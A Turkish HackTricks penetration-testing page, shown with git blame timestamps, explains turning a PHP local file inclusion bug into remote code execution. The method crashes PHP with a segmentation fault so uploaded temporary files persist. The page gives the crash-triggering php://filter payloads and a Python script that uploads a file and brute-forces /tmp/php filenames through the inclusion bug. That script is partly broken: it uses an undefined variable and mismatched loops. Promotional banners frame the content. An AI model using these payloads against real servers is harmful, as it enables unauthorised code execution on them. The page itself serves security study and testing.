hacktricks/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md

87 lines
4.4 KiB
Markdown
Raw Normal View History

2024-02-10 18:14:16 +00:00
# LFI2RCE via Segmentasyon Hatası
2022-12-14 00:23:57 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-12-14 00:23:57 +00:00
<details>
2022-12-14 00:23:57 +00:00
<summary>HackTricks'i Destekleyin</summary>
2024-02-03 16:02:14 +00:00
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-12-14 00:23:57 +00:00
</details>
{% endhint %}
2024-02-05 20:00:40 +00:00
Writeup'lara göre [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), aşağıdaki yükler PHP'de bir segmentasyon hatasına neden oldu:
2022-12-14 00:23:57 +00:00
```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");
// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```
Eğer bir **POST** isteği **gönderirseniz** ve içinde bir **dosya bulunuyorsa**, PHP o dosyanın içeriğiyle birlikte `/tmp/php<something>` dizininde geçici bir dosya oluşturacaktır. Bu dosya, istek işlendikten sonra **otomatik olarak silinecektir**.
2022-12-14 00:23:57 +00:00
Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası oluşturmayı başarırsanız**, geçici dosya **asla silinmeyecektir**. Bu nedenle, **LFI** zafiyeti ile o dosyayı bulabilir ve keyfi kodları çalıştırabilirsiniz.
2022-12-14 00:23:57 +00:00
2024-02-10 18:14:16 +00:00
Test için [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) docker imajını kullanabilirsiniz.
2022-12-14 00:23:57 +00:00
```python
# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)
# Search for the file (improve this with threads)
import requests
import string
import threading
charset = string.ascii_letters + string.digits
host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)
def bruteforce(charset):
2024-02-10 18:14:16 +00:00
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = prefix + i + j + k
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
print url
response = requests.get(url)
if 'spyd3r' in response.content:
print "[+] Include success!"
return True
2022-12-14 00:23:57 +00:00
def main():
2024-02-10 18:14:16 +00:00
bruteforce(charset)
2022-12-14 00:23:57 +00:00
if __name__ == "__main__":
2024-02-10 18:14:16 +00:00
main()
2022-12-14 00:23:57 +00:00
```
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-12-14 00:23:57 +00:00
<details>
2022-12-14 00:23:57 +00:00
<summary>HackTricks'i Destekleyin</summary>
2024-02-03 16:02:14 +00:00
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
2022-12-14 00:23:57 +00:00
2024-02-10 18:14:16 +00:00
</details>
{% endhint %}